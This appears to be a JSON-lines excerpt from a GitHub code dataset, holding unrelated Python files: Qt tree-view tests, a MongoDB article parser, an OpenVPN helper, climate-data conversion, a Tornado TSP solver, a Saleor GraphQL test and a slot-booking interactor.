count_items(tree.tree) == 0\n\n\ndef test_clear(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n\n contents = []\n for node in tree.iternodes('a'):\n contents.append(node.obj_id)\n assert ''.join(contents) == 'a.b.c.d'\n\n from pyvmmonitor_qt import qt_utils\n assert qt_utils.count_items(tree.tree) == 2\n tree.clear()\n assert qt_utils.count_items(tree.tree) == 0\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n assert qt_utils.count_items(tree.tree) == 2\n\n\ndef test_color(qtapi, tree):\n tree.tree.show()\n tree['a'] = [10, 20]\n from pyvmmonitor_qt.qt.QtGui import QBrush\n from pyvmmonitor_qt.qt.QtGui import QColor\n from pyvmmonitor_qt.qt.QtCore import Qt\n tree['a'].set_foreground_brush(QBrush(QColor(Qt.red)))\n\n assert tree['a'].get_foreground_brush(0).color() == QColor(Qt.red)\n\n tree['a'].set_background_brush(QBrush(QColor(Qt.gray)))\n\n assert tree['a'].get_background_brush(0).color() == QColor(Qt.gray)\n\n\ndef test_selection(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n\n tree.set_selection(['a.b.c.d'])\n assert tree.get_selection() == ['a.b.c.d']\n\n tree.set_selection(['a', 'a.b.c.d'])\n assert tree.get_selection() == ['a', 'a.b.c.d']\n\n\ndef test_sort_order(qtapi, tree):\n '''\n By default there's no sorting (it's kept by insertion order), but it's possible to turn on the\n sorting to be used and set the sort key.\n '''\n tree.tree.show()\n\n tree['a'] = 'a'\n tree['c'] = 'c'\n tree['b'] = 'b'\n assert tree.list_item_captions() == 'a c b'.split()\n\n tree.sorting_enabled = True\n\n assert tree.list_item_captions() == 'a b c'.split()\n\n tree['d'] = 'a'\n assert tree.list_item_captions() == 'a a b c'.split()\n\n tree.sorting_enabled = False\n\n tree['e'] = 'b'\n assert tree.list_item_captions() == 'a a b c b'.split()\n\n tree.sorting_enabled = True\n\n assert tree.list_item_captions() == 'a a b b c'.split()\n\n with tree.batch_changes():\n tree['f'] = 'b'\n tree['g'] = 'a'\n assert not tree.sorting_enabled\n\n assert tree.list_item_captions() == 'a a a b b b c'.split()\n\n for node in tree.iternodes():\n # Reverse sort order\n node.sort_key = ord('z') - ord(node.data[0])\n\n # for node in sorted(tree.iternodes(), key=lambda node: node.sort_key):\n # print(node.obj_id, node.data, node.sort_key)\n\n tree.sort_strategy = 'sort_key'\n assert tree.list_item_captions() == list(reversed('a a a b b b c'.split()))\n\n tree.sort_strategy = 'display'\n assert tree.list_item_captions() == 'a a a b b b c'.split()\n\n # Now, let's change the caption and make sure it's still Ok.\n tree['g'].data = 'g'\n\n assert tree.list_item_captions() == 'a a b b b c g'.split()\n\n\ndef test_insert_order(qtapi, tree):\n tree.tree.show()\n\n tree['a'] = 'a'\n tree['c'] = 'c'\n tree['b'] = 'b'\n assert tree.list_item_captions() == 'a c b'.split()\n\n tree.add_node('a', 'a.x', 'x')\n\n assert tree.list_item_captions() == 'a +x c b'.split()\n\n tree.add_node('a', 'a.y', 'y', index=0)\n\n assert tree.list_item_captions() == 'a +y +x c b'.split()\n\n tree.add_node(None, 'z', 'z', index=1)\n\n assert tree.list_item_captions() == 'a +y +x z c b'.split()\n\n\ndef test_icon(qtapi):\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n\n # Example on how to deal with a mouse click.\n class MyQTreeView(QTreeView):\n\n def mousePressEvent(self, ev):\n index = self.indexAt(ev.pos())\n if index.isValid():\n # print('col', col, 'col_width', col_width, 'col_viewport_pos', col_viewport_pos)\n # print('relative', relative_x)\n if index.column() == 1:\n col = self.columnAt(ev.pos().x())\n col_width = self.columnWidth(col)\n col_viewport_pos = self.columnViewportPosition(col)\n relative_x = ev.pos().x() - col_viewport_pos\n\n node = tree.node_from_index(index)\n print(node.__class__, relative_x, col_width)\n ev.setAccepted(True)\n return\n return QTreeView.mousePressEvent(self, ev)\n\n tree = MyQTreeView()\n tree = PythonicQTreeView(tree)\n tree.columns = ['Caption', 'Action']\n tree.tree.show()\n\n tree['a'] = ('a', '')\n tree['c'] = ('c', '')\n tree['b'] = ('b', '')\n\n from pyvmmonitor_qt.qt.QtGui import QPixmap\n pixmap = QPixmap(30, 30)\n from pyvmmonitor_qt.qt.QtCore import Qt\n pixmap.fill(Qt.red)\n\n # Should show a red square for column 1\n tree['a'].set_item_role(Qt.DecorationRole, 1, pixmap)\n\n # __eq__ works properly for QImage but not QPixmap.\n assert tree['a'].item_role(Qt.DecorationRole, 1).toImage() == pixmap.toImage()\n tree.tree.hide()\n tree.tree.deleteLater()\n\n\ndef test_custom_widget(qtapi, tree):\n tree.columns = ['Caption', 'Action']\n tree.tree.show()\n\n tree['a'] = ('a', '')\n tree['c'] = ('c', '')\n tree['b'] = ('b', '')\n\n from pyvmmonitor_qt.qt.QtGui import QPixmap\n from pyvmmonitor_qt.qt.QtWidgets import QPushButton\n from pyvmmonitor_qt.qt.QtCore import Qt\n\n bt = QPushButton(None)\n icon = QPixmap(20, 20)\n icon.fill(Qt.red)\n from pyvmmonitor_qt.qt.QtGui import QIcon\n bt.setIcon(QIcon(icon))\n bt.setAutoFillBackground(True)\n\n # Should show a button at column 1\n tree['a'].set_item_custom_widget(1, bt)\n assert tree['a'].item_custom_widget(1) == bt\n\n\nclass FilteredTreeViewWidget(QWidget):\n\n def __init__(self, pythonic_tree_view=None):\n QWidget.__init__(self)\n from pyvmmonitor_qt.qt.QtWidgets import QVBoxLayout\n self._vbox = QVBoxLayout(self)\n\n from pyvmmonitor_qt.qt.QtWidgets import QLineEdit\n self._edit_text_filter = QLineEdit(self)\n self._vbox.addWidget(self._edit_text_filter)\n\n if pythonic_tree_view is None:\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n tree = QTreeView(self)\n pythonic_tree_view = PythonicQTreeView(tree)\n else:\n pythonic_tree_view.tree.setParent(self)\n\n self._vbox.addWidget(pythonic_tree_view.tree)\n self.setLayout(self._vbox)\n self._pythonic_tree_view = pythonic_tree_view\n\n self._edit_text_filter.textChanged.connect(self._on_filter_text_changed)\n\n def _on_filter_text_changed(self, *args, **kwargs):\n self._pythonic_tree_view.filter_text = self.filter_text\n\n @property\n def filter_text(self):\n return self._edit_text_filter.text()\n\n @filter_text.setter\n def filter_text(self, text):\n self._edit_text_filter.setText(text)\n self._pythonic_tree_view.filter_text = text\n\n @property\n def tree(self):\n return self._pythonic_tree_view.tree\n\n @property\n def pythonic_tree_view(self):\n return self._pythonic_tree_view\n\n\ndef test_filtering(qtapi, tree):\n\n tree.columns = ['Caption', 'Action']\n\n tree['a'] = 'aa', 'aab'\n tree['a.b'] = 'bb', 'bbb'\n\n filtered_tree = FilteredTreeViewWidget(tree)\n filtered_tree.filter_text = 'a'\n from pyvmmonitor_qt.qt_utils import list_wiget_item_captions\n assert list_wiget_item_captions(filtered_tree.tree) == ['aa']\n\n filtered_tree.filter_text = ''\n assert list_wiget_item_captions(filtered_tree.tree) == ['aa', '+bb']\n\n\n@pytest.fixture\ndef virtual_tree():\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n tree = QTreeView()\n\n def has_children(pythonic_tree, node):\n if node is None or node.data[0] == '1':\n return True\n return False\n\n def create_children(pythonic_tree, node):\n if node is None:\n pythonic_tree['1'] = '1'\n pythonic_tree['3'] = '2'\n else:\n if node.data[0] == '1':\n pythonic_tree.add_node(node, 'foo', '5')\n\n tree = PythonicQTreeView(tree, has_children=has_children, create_children=create_children)\n yield tree\n from pyvmmonitor_qt import qt_utils\n if qt_utils.is_qobject_alive(tree.tree):\n tree.tree.deleteLater()\n tree = None\n from pyvmmonitor_qt.qt_event_loop import process_events\n process_events(collect=True)\n\n\ndef test_virtual_model(qtapi, virtual_tree):\n from pyvmmonitor_qt.qt_utils import list_wiget_item_captions\n virtual_tree.tree.show()\n assert list_wiget_item_captions(virtual_tree.tree) == ['1', '+5', '2']\n virtual_tree.clear()\n assert list_wiget_item_captions(virtual_tree.tree) == []\n","repo_name":"fabioz/pyvmmonitor-qt","sub_path":"_pyvmmonitor_qt_tests/test_pythonic_tree_view.py","file_name":"test_pythonic_tree_view.py","file_ext":"py","file_size_in_byte":12138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37249512542","text":"import json\nimport os\nimport sys\nfrom pymongo import MongoClient\nimport urllib3\nfrom bs4 import BeautifulSoup, SoupStrainer\n\n# Get Config file\nwith open(\"config.json\") as config_file:\n config = json.load(config_file)\n\n# Connect to mongo\nclient = MongoClient(\"mongodb://\" + os.environ['IP'] + \"/\") #for cloud nine, use MongoClient(config['db_url']) for config\ndb = client[config['db_client']]\n\npages = db.pages\narticles = db.articles\n\ncount = 0\n\nfor page in pages.find():\n\tbody = page['body']\n\tid = page['_id']\n\turl = page['url']\n\t\n\ttry:\n\t\tsoup = BeautifulSoup(body)\n\t\t\n\t\t# Meta indicators - specific to Joel on software\n\t\ttitle = soup.find('h2').getText()\n\t\tauthor = soup.find('div', {\"class\": \"author\"}).getText()\n\t\tdate = soup.find('div', {\"class\": \"date\"}).getText()\n\t\t\n\n\t\t\n\t\tif author.startswith('by '):\n\t\t\tauthor = author[3:]\n\t\t\n\t\tsplit_date = date.split(' ')\n\t\tdow = split_date[0][:-1]\n\t\tmonth = split_date[1]\n\t\tday = split_date[2][:-1]\n\t\tyear = split_date[3]\n\t\t\n\t\t\n\t\t#print(title.encode())\n\t\t#print(author.encode())\n\t\t#print(date.encode())\n\t\t#print(dow.encode())\n\t\t#print(month.encode())\n\t\t#print(day.encode())\n\t\t#print(year.encode())\n\t\t#print(\"#\")\n\t\t\n\t\tjson_article = {\n\t\t\t\"title\": title,\n\t\t\t\"author\": author,\n\t\t\t\"date\": date,\n\t\t\t\"dow\": dow,\n\t\t\t\"day\": day,\n\t\t\t\"month\": month,\n\t\t\t\"year\": year,\n\t\t\t\"body\": body,\n\t\t\t\"page\": id,\n\t\t\t\"url\": url\n\t\t}\n\t\t\n\t\tarticles.insert_one(json_article)\n\t\t\n\t\tcount = count + 1\n\t\n\texcept:\n\t\tprint(\"Error\")\n\nprint(count)\n\t\n","repo_name":"ash-williams/NLP_MiniProject","sub_path":"old_scripts/4-cleanHTML2.py","file_name":"4-cleanHTML2.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10641805191","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=R0904\n\n\"\"\"File that contains SimplifiedOpenvpnHelper class.\"\"\"\n\nimport os\nimport socket\nimport inspect\nimport hashlib\nfrom requests import get\n\n\nclass SimplifiedOpenvpnHelper:\n \"\"\"Class that contains shareable helper methods.\"\"\"\n\n @staticmethod\n def current_method():\n \"\"\"Returns name of the current method.\"\"\"\n return inspect.stack()[1][3]\n\n @staticmethod\n def read_file_as_value(filename, verbose=False):\n \"\"\"Reads contents of the file and returns it.\"\"\"\n if not os.path.isfile(filename):\n if verbose:\n print(\"> File that you tried to read as value doesn't exist.\")\n return None\n\n value = None\n with open(filename) as content:\n value = content.read().rstrip()\n return value\n\n @staticmethod\n def create_directory(value, mode=0o700):\n \"\"\"Creates new directory on filesystem.\"\"\"\n if not os.path.exists(value):\n os.makedirs(value, mode)\n\n @staticmethod\n def sanitize_path(path):\n \"\"\"Makes sure that path are ending with forward slash.\"\"\"\n if os.path.isfile(path):\n if path.endswith('/'):\n path = path.rstrip('/')\n elif os.path.isdir(path):\n if not path.endswith('/'):\n path = path + '/'\n\n return path\n\n @staticmethod\n def is_valid_ipv4(ipv4):\n \"\"\"Check if IP is valid IPv4 address.\"\"\"\n if isinstance(ipv4, str) and len(ipv4.strip()) > 6:\n return True\n return False\n\n @staticmethod\n def is_valid_hostname(hostname):\n \"\"\"Checks if specified hostname matches rules and returns boolean.\"\"\"\n if len(hostname) > 255 or len(hostname) < 1:\n return False\n return True\n\n @staticmethod\n def fetch_hostname_by_system():\n \"\"\"Fetches Fully Qualified Domain Name from system.\"\"\"\n return socket.getfqdn()\n\n @staticmethod\n def fetch_hostname_by_reverse_dns(ipv4=None):\n \"\"\"Tries to fetch hostname by reverse DNS lookup and returns it if possible.\"\"\"\n if ipv4 is None:\n ipv4 = SimplifiedOpenvpnHelper.fetch_external_ipv4()\n if ipv4:\n return socket.gethostbyaddr(ipv4)\n return None\n\n @staticmethod\n def fetch_external_ipv4():\n \"\"\"Fetches and returns external IPv4 address.\"\"\"\n ipv4 = get('http://api.ipify.org').text\n if ipv4:\n return ipv4.strip()\n return None\n\n @staticmethod\n def generate_share_hash(slug, sovpn_share_salt=''):\n \"\"\"Calculates and return SOVPN share hash for specified slug.\"\"\"\n feed = (sovpn_share_salt + slug).encode('utf-8')\n share_hash = hashlib.sha1(feed).hexdigest()\n return share_hash\n","repo_name":"rudissaar/simplified-openvpn","sub_path":"simplified_openvpn_helper.py","file_name":"simplified_openvpn_helper.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"22885442412","text":"\"\"\"\nThis script is used to process downloaded historic normal data from PRISM. \n~~~~~~~~~~~~~~~~~~~~\nAuthor: Cindy Chiao\nLast Edit Date: 04/19/2016\n\nObtained historic climate normals from PRISM project\nhttp://www.prism.oregonstate.edu/documents/PRISM_datasets.pdf\nhttp://www.prism.oregonstate.edu/normals/\n\"\"\"\nimport subprocess\nimport numpy as np\n\n# Setting local variables\nvariables = ['ppt', 'tmean']\nfolder = '../data/normals/'\ngrid = '../data/mask.nc'\n\nbase_fname = 'PRISM_{var}_30yr_normal_4kmM2_all_asc/PRISM_{var}_30yr_normal_4kmM2_{m:02d}_asc.asc'\nbase_nc_name = '{var}.{m:02d}.nc'\n# the version of gdal to be used\ngdal = '/opt/local/bin/gdal_translate'\n\nmonths = np.arange(1, 13)\n\n# Use gdal to translate the ascii data into netCDF format\n# Use CDO to merge monthly data into 1 file\nfor var in variables:\n files = []\n for month in months:\n subprocess.call([gdal, '-of', 'netCDF', \n folder+base_fname.format(var=var, m=month), \n folder+base_nc_name.format(var=var, m=month)])\n files.append(folder+base_nc_name.format(var=var, m=month))\n subprocess.call(['cdo', 'merge', ' '.join(files), folder+'{var}.monthly.nc'.format(var=var)])\n for f in files:\n subprocess.call(['rm', f])\n\n# Use CDO to remap PRISM data into the grid file used for this project\nsubprocess.call(['cdo', 'remapcon,{grid}'.format(grid=grid), \n folder+'ppt.monthly.nc', folder+'ppt.monthly.mask.nc'])\n\nsubprocess.call(['cdo', 'remapbil,{grid}'.format(grid=grid), \n folder+'tmean.monthly.nc', folder+ 'tmean.monthly.mask.nc'])","repo_name":"tcchiao/fall-foliage-finder","sub_path":"src/process_prism.py","file_name":"process_prism.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"32605286656","text":"import os\nimport glob\nfrom biothings.hub.dataload.uploader import ParallelizedSourceUploader\nfrom hub.dataload.uploader import SnpeffPostUpdateUploader\nfrom .wellderly_parser import WellderlyTsvReader\n\n\nclass WellderlyUploader(ParallelizedSourceUploader, SnpeffPostUpdateUploader):\n \"\"\"Data originally coming from: http://www.stsiweb.org/wellderly\"\"\"\n\n name = \"wellderly\"\n\n __metadata__ = {\n \"mapper\": 'observed',\n \"assembly\": \"hg19\",\n \"src_meta\": {\n \"url\": \"https://www.scripps.edu/science-and-medicine/translational-institute/translational-research/genomic-medicine/wellderly\",\n \"license_url\": \"https://redcapstsi.scripps.edu/redcap/surveys/?s=NT4N7A3KJD\",\n \"license_url_short\": \"https://bit.ly/32tpCvP\"\n }\n }\n\n def jobs(self):\n \"\"\"\n this method will be called by self.update_data() and then generate arguments for self.load.data() method,\n allowing parallelization\n \"\"\"\n tsv_filename_pattern = \"Wellderly.chr*.g.vcf.gz.tsv\"\n tsv_file_collection = glob.glob(os.path.join(self.data_folder, tsv_filename_pattern))\n\n assembly = self.__metadata__[\"assembly\"]\n\n return [(tsv_file, assembly) for tsv_file in tsv_file_collection]\n\n def load_data(self, file, assembly):\n \"\"\"load data from an input file\"\"\"\n self.logger.info(\"Load data from file {} (assembly: {})\".format(file, assembly))\n\n return WellderlyTsvReader.load_data(file, assembly)\n\n @classmethod\n def get_mapping(klass):\n mapping = {\n \"wellderly\": {\n \"properties\": {\n \"chrom\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"pos\": {\n \"type\": \"long\"\n },\n \"hg19\": {\n \"properties\": {\n \"start\": {\n \"type\": \"integer\"\n },\n \"end\": {\n \"type\": \"integer\"\n }\n }\n },\n \"ref\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"alt\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"vartype\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"alleles\": {\n \"properties\": {\n \"allele\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"freq\": {\n \"type\": \"float\"\n }\n }\n }\n }\n }\n }\n return mapping\n","repo_name":"biothings/myvariant.info","sub_path":"src/hub/dataload/sources/wellderly/wellderly_upload.py","file_name":"wellderly_upload.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"48"} +{"seq_id":"12269346711","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 28 10:36:03 2018\n\n@author: Administrator\n\"\"\"\n\"\"\"\nfilename = ('filtered_words.txt')\ncontens = input(\"请输入内容:\")\n\nfor filter_word in open(filename):\n \n if filter_word.rstrip() in contens:#使用rstrip()去掉右边的跨行符\n filter_words.append(filter_word.rstrip()) \n print(filter_words) \n \n #filter_word.replace(, '*')\n #print(contens)\n \n # break\n#else:\n # print(\"Human Rights\")\n \n\"\"\"\n\n\"\"\"\nuser_input = input(\"请输入内容 :\")\nprint(user_input)\nfor filter_word in open('filtered_words.txt'):\n \n if filter_word.rstrip() in user_input:\n \n user_input.replace()\n print('Freedom')\n break\nelse:\n print('Human Rights')\n \n\"\"\"\n\n\"\"\"\nfiltered = []\n\ndef get_filtered_words():\n f = open()\n\n\"\"\"\n\n\n\nuser_input = input(\"请输入内容:\")\nfor filter_word in open('filtered_words.txt'):\n fw = filter_word.rstrip()\n if fw in user_input:\n fw_len = len(fw)\n user_input= user_input.replace(fw,'*'*fw_len)\n print(user_input)\n \n \n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"GeHaha/AboutPython","sub_path":"PythonDaily/PythonLearing/net_test/敏感词/敏感词替换.py","file_name":"敏感词替换.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38220968383","text":"import rospy\nfrom performance_tests.msg import SuperAwesome\n\ndef callback(data):\n rospy.loginfo(\"%s\", data.data)\n \ndef listener():\n rospy.init_node('Subscriber_Python', anonymous=True)\n rospy.Subscriber(\"SuperAwesome_Topic\", SuperAwesome, callback)\n rospy.spin()\n\nif __name__ == '__main__':\n listener()","repo_name":"cesar-vargas88/BOR_Performance","sub_path":"scripts/Subscriber.py","file_name":"Subscriber.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"194579619","text":"import tornado.httpserver\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.web\nimport json\nimport itertools\nimport math\n\nclass Coords:\n\n def __init__(self,coords,length):\n self.coords = coords\n self.length = float('%.7f' % length)\n\n def __eq__(self,other):\n index = -1\n\n for i in self.coords:\n if i[0] == other.coords[index][0] and i[1] == other.coords[index][1]:\n index-=1\n else:\n return False\n\n return True\n\n def __ne__(self,other):\n index = -1\n\n for i in self.coords:\n if i[0] == other.coords[index][0] and i[1] == other.coords[index][1]:\n return False\n else:\n index-=1\n\n return True\n\n def __lt__(self,other):\n if self.length < other.length:\n return True\n else:\n return False\n\n def __gt__(self,other):\n if self.length > other.length:\n return True\n else:\n return False\n\n def __hash__(self):\n return int(self.length * 1000000)\n\n def len(self):\n return self.length\n\n def route(self):\n return self.coords\n\ndef permutate(dataList):\n coord_list = []\n\n if(len(dataList) > 18):\n return \"0\"\n\n for i in range(0, len(dataList), 2):\n y_coord = dataList.pop()\n x_coord = dataList.pop()\n coord_list.append([x_coord,y_coord])\n\n coord_sub_list = coord_list[1:]\n\n perms = itertools.permutations(coord_sub_list)\n\n distances = []\n perms_list = []\n coords_obj_list = []\n\n for i in perms:\n perms_list.append(i)\n summa = calculate_distances(i)\n summa_2 = calculate_distances_to_first_node(i,coord_list)\n distances.append(summa+summa_2)\n coords_obj_list.append(Coords(i,summa+summa_2))\n\n coords_obj_list.sort()\n\n unique_list = list(set(coords_obj_list))\n unique_list.sort()\n\n min_path = []\n min_path_2 = []\n\n min_path = list(unique_list[0].route())\n min_path_length = unique_list[0].len()\n min_path.insert(0,coord_list[0])\n min_path.append(coord_list[0])\n\n if(len(unique_list) > 1):\n min_path_2 = list(unique_list[1].route())\n min_path_2_length = unique_list[1].len()\n min_path_2.insert(0,coord_list[0])\n min_path_2.append(coord_list[0])\n\n if(len(min_path_2) > 1):\n min_path += min_path_2\n min_path.insert(0,1) #array to be returned contains both shortest and 2nd shortest paths\n else:\n min_path.insert(0,0) #array to be returned contains only shortest path\n\n return json.dumps(min_path)\n\ndef calculate_distances(list_of_coords):\n sum = 0\n for x in range(1, len(list_of_coords)):\n sum += calculate_distance(list_of_coords[x-1],list_of_coords[x])\n return sum\n\ndef calculate_distance(lista1,lista2):\n delta_x = lista1[0] - lista2[0]\n delta_y = lista1[1] - lista2[1]\n return math.sqrt( math.pow(delta_x, 2) + math.pow(delta_y, 2))\n\ndef calculate_distances_to_first_node(route,coords):\n first_node = coords[0]\n route_head = route[0]\n route_tail = route[-1]\n from_first_node_to_head = calculate_distance(first_node,route_head)\n from_first_node_to_tail = calculate_distance(first_node,route_tail)\n sum = from_first_node_to_head + from_first_node_to_tail\n return sum\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n\n def check_origin(self, origin):\n return True\n\n def open(self):\n print('User is connected.')\n\n def on_message(self, message):\n obj = json.loads(message)\n self.write_message(permutate(obj))\n\n def on_close(self):\n print('Connection closed.')\n\n#Uncomment following line if you are providing only the web socket interface and not serving static files with Tornado\napplication = tornado.web.Application([(r'/tsp', WSHandler),])\n\n#Uncomment following line if you are providing both the web socket interface and static file serving with Tornado\n#application = tornado.web.Application([(r'/tsp', WSHandler),(r\"/content/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"/var/www/visual-tsp\"})])\n\nif __name__ == \"__main__\":\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(9999)\n print('Server listening on port 9999')\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"jutunen/visual-TSP","sub_path":"servers/python/tsp-solver.py","file_name":"tsp-solver.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44396810263","text":"import pytest\nfrom sqlmodel import select\n\nfrom app.core.reports.models import Job, Report\n\nMUTATION_DELETE_REPORT = \"\"\"\nmutation DeleteReport($reportId: Int!) {\n deleteReport (reportId: $reportId) {\n errors {\n code\n message\n field\n }\n }\n}\n\"\"\"\n\n\n@pytest.mark.asyncio\nasync def test_delete_report(\n db_session, graphql, orders_report, export_orders_job, products_report\n):\n # given\n variables = {\"reportId\": orders_report.id}\n\n # when\n result = await graphql.execute(MUTATION_DELETE_REPORT, variables)\n\n # then\n assert result[\"data\"][\"deleteReport\"][\"errors\"] == []\n assert (\n await db_session.exec(select(Report).where(Report.id == orders_report.id))\n ).first() is None\n assert (\n await db_session.exec(select(Job).where(Job.report_id == orders_report.id))\n ).first() is None\n assert (\n await db_session.exec(select(Job).where(Job.report_id == products_report.id))\n ).first() is None\n\n\n@pytest.mark.asyncio\nasync def test_delete_not_found(db_session, graphql):\n # given\n variables = {\"reportId\": -1}\n\n # when\n result = await graphql.execute(MUTATION_DELETE_REPORT, variables)\n\n # then\n error = result[\"data\"][\"deleteReport\"][\"errors\"][0]\n assert error[\"code\"] == \"NOT_FOUND\"\n assert error[\"field\"] == \"reportId\"\n","repo_name":"SaleorIntegrations/saleor-app-export","sub_path":"app/graphql/reports/tests/test_delete_report.py","file_name":"test_delete_report.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5004665543","text":"import torch\nimport os\nimport random\nimport numpy as np\n\n\ndef seed_all(seed: int = 1930):\n \"\"\"Seed all random number generators.\"\"\"\n print(\"Using Seed Number {}\".format(seed))\n\n os.environ[\"PYTHONHASHSEED\"] = str(\n seed\n ) # set PYTHONHASHSEED env var at fixed value\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.cuda.manual_seed(seed) # pytorch (both CPU and CUDA)\n np.random.seed(seed) # for numpy pseudo-random generator\n random.seed(seed) # set fixed value for python built-in pseudo-random generator\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.enabled = False\n\n\ndef seed_worker(_worker_id):\n \"\"\"Seed a worker with the given ID.\"\"\"\n worker_seed = torch.initial_seed() % 2 ** 32\n np.random.seed(worker_seed)\n random.seed(worker_seed)\n","repo_name":"ghnreigns/SHOPEE","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10951088003","text":"from datetime import datetime\nfrom slot_booking.interactors.storages.user_slot_storage_interface \\\n import UserSlotStorageInterface\nfrom slot_booking.interactors.storages.washing_machine_slot_storage_interface \\\n import WashingMachineSlotStorageInterface\nfrom slot_booking.interactors.storages.configure_slot_storage_interface \\\n import ConfigureSlotStorageInterface\n\nfrom slot_booking.interactors.presenters.presenter_interface import \\\n PresenterInterface\n\nfrom slot_booking.constants.enums import Day\nimport time\n\nclass BookASlotInteractor:\n\n def __init__(self,\n washing_machine_slot_storage: WashingMachineSlotStorageInterface,\n user_slot_storage: UserSlotStorageInterface,\n configure_slot_storage: ConfigureSlotStorageInterface,\n presenter: PresenterInterface\n ):\n\n self.washing_machine_slot_storage = washing_machine_slot_storage \n self.user_slot_storage = user_slot_storage\n self.configure_slot_storage = configure_slot_storage\n self.presenter = presenter\n\n\n def _valid_date_details(self, user_id: int, date: str):\n\n present_date = datetime.now().date()\n\n is_not_valid_date_to_book = date < present_date\n# print(present_date, is_not_valid_date_to_book, date)\n if is_not_valid_date_to_book:\n self.presenter.raise_exception_for_invalid_date()\n return False\n\n book_no_of_days_after = \\\n self.configure_slot_storage.book_no_of_days_after()\n\n\n user_last_used_date = self.user_slot_storage.last_used_date(\n user_id\n )\n\n# print(book_no_of_days_after, user_last_used_date)\n is_user_cannot_book_in_date = False\n if user_last_used_date:\n diff_in_days = present_date - user_last_used_date\n is_user_cannot_book_in_date = \\\n book_no_of_days_after>=diff_in_days.days\n\n #print(\"22\"*2, user_last_used_date)\n if is_user_cannot_book_in_date:\n self.presenter.raise_exception_for_cannot_book_in_date()\n return \n\n return True\n\n\n def _get_day(self, date: str):\n days = [day.value for day in Day]\n\n day = date.strftime(\"%A\")\n print(day, days)\n no_slots_in_given_date = day not in days\n if no_slots_in_given_date:\n self.presenter.raise_exception_for_no_slots_in_given_date()\n return False\n\n return day\n\n\n def _valid_time_slots(self, day: str, start_time: str, end_time: str):\n\n washing_machines_ids = \\\n self.washing_machine_slot_storage.washing_machines_in_given_slot(\n day, start_time, end_time\n )\n# print(day, start_time, end_time, washing_machines_ids)\n no_washing_machine_slots = not washing_machines_ids\n if no_washing_machine_slots:\n self.presenter.raise_exception_for_invalid_time_slot()\n return False\n\n return washing_machines_ids\n\n\n def book_a_slot(self, user_id: int, date: str, start_time: str, \n end_time: str):\n\n print(\"a\"*20, \"login\")\n not_valid_date_details_to_book = not self._valid_date_details(\n user_id=user_id, date=date)\n\n if not_valid_date_details_to_book:\n return\n\n\n day = self._get_day(date=date)\n invalid_day = not day\n #print(\"b\"*20, not_valid_date_details_to_book, invalid_day)\n if invalid_day:\n return\n print(\"b\"*20, not_valid_date_details_to_book, invalid_day)\n\n washing_machines_ids = self._valid_time_slots(day=day, \n start_time=start_time, end_time=end_time\n )\n\n invalid_time_slots = not washing_machines_ids\n\n if invalid_time_slots:\n return \n\n\n slot_booked = self.user_slot_storage.create_user_slot(\n user_id, date, start_time, end_time, washing_machines_ids\n )\n\n print(\"33\")\n if slot_booked:\n slot_response = self.presenter.get_response_for_slot_booked()\n else:\n slot_response = \\\n self.presenter.get_response_for_unavailable_washing_machines()\n\n return 